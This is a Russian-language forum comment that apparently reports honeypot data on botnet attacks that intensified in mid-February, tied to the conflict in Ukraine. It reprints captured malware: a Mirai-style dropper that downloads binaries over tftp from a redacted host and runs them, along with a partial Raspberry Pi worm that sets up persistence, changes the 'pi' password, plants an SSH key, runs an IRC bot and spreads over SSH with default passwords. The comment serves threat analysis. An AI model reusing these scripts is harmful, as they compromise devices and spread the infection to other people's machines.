Pull to refresh

Comments 1

  1. Кибервойны, конфликты, бокс по удалёнке.

    Начало событий в Украине с точки зрения Honeypot выглядит так

    16 февраля активизировались ботнеты. Судя по информации Virustotal это разновидность Mirai.

    Если до 16 февраля были такие себе одиночные пики мощных брутфорс-атак, то сейчас вот такая картина.

    Географическое расположение - по всем странам, с использованием TOR.

    Как работает:

    После успешной атаки бот пытается загрузить скрипт по ссылкам вида:

    http://IP-Addr/x/1sh

    http://IP-Addr/x/2sh

    http://IP-Addr/x/3sh

    Скрипт в свою очередь загружает версии вредоноса под разные платформы:

Hidden text
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86 -g <IP-addr> ;cat uYtea.x86 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mips -g <IP-addr> ;cat uYtea.mips >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mpsl -g <IP-addr> ;cat uYtea.mpsl >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm -g <IP-addr> ;cat uYtea.arm >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm5 -g <IP-addr> ;cat uYtea.arm5 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm6 -g <IP-addr> ;cat uYtea.arm6 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm7 -g <IP-addr> ;cat uYtea.arm7 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.ppc -g <IP-addr> ;cat uYtea.ppc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.m68k -g <IP-addr> ;cat uYtea.m68k >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.sh4 -g <IP-addr> ;cat uYtea.sh4 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.spc -g <IP-addr> ;cat uYtea.spc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arc -g <IP-addr> ;cat uYtea.arc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86_64 -g <IP-addr> ;cat uYtea.x86_64 >x ;chmod +x *;./x SSH.Selfrep

Так же, были замечены и другие модификации.

Пример используемых ссылок для загрузки:

ftp://anonymous:anonymous@IP/.sh
http://IP/onions1337

Функционал аналогичен.

  1. Пользователи, пароли

    15 самых популярных пользователей (данные за последний месяц)

    Hidden text

    15 самых популярных паролей (данные за последний месяц)

Hidden text
  1. География (данные за последний месяц)

    Выглядит всё это безобразие примерно вот так:

Hidden text
  1. "Малинка" и желающие забраться в малинник.

    Что касается атак именно на Raspberry Pi, явно отслеживается следующая штука.

Hidden text

Пароли

Hidden text

Скрипт не полный

C0755 4745 rbFCPCn5
#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then
        NEWMYSELF=`mktemp -u 'XXXXXXXX'`
        sudo cp $MYSELF /opt/$NEWMYSELF
        sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
        sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
        sudo sh -c "echo 'exit 0' >> /etc/rc.local"
        sleep 1
        sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmE>

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----

-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

        arr[0]="ix1.undernet.org"
        arr[1]="ix2.undernet.org"
        arr[2]="Ashburn.Va.Us.UnderNet.org"
        arr[3]="Bucharest.RO.EU.Undernet.Org"
        arr[4]="Budapest.HU.EU.UnderNet.org"
        arr[5]="Chicago.IL.US.Undernet.org"
        rand=$[$RANDOM % 6]
        svr=${arr[$rand]}

        ....
        
        # Main loop
        while [ true ]; do
                eval "read msg_in <&3;"

                if [[ ! "$?" -eq 0 ]] ; then
                        break
                fi

                if  [[ "$msg_in" =~ "PING" ]] ; then
                        printf "PONG %s\n" "${msg_in:5}";
                        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
                        if [[ ! "$?" -eq 0 ]] ; then
                                break
                        fi
                        sleep 1
                        eval 'printf "JOIN #biret\r\n" >&3;'
                        if [[ ! "$?" -eq 0 ]] ; then
                                break
                        fi
....
                fi
        done
done
EOFMARKER

....

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
        FILE=`mktemp`
        zmap -p 22 -o $FILE -n 100000
        killall ssh scp
        for IP in `cat $FILE`
        do
                sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $M>
                sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKe>
        done
        rm -rf $FILE
        sleep 10
done
....

Эта штука - Linux/IRCBot.AU (Eset NOD)

Довольно много развелось этого, судя по honeypot.

Sign up to leave a comment.

Other news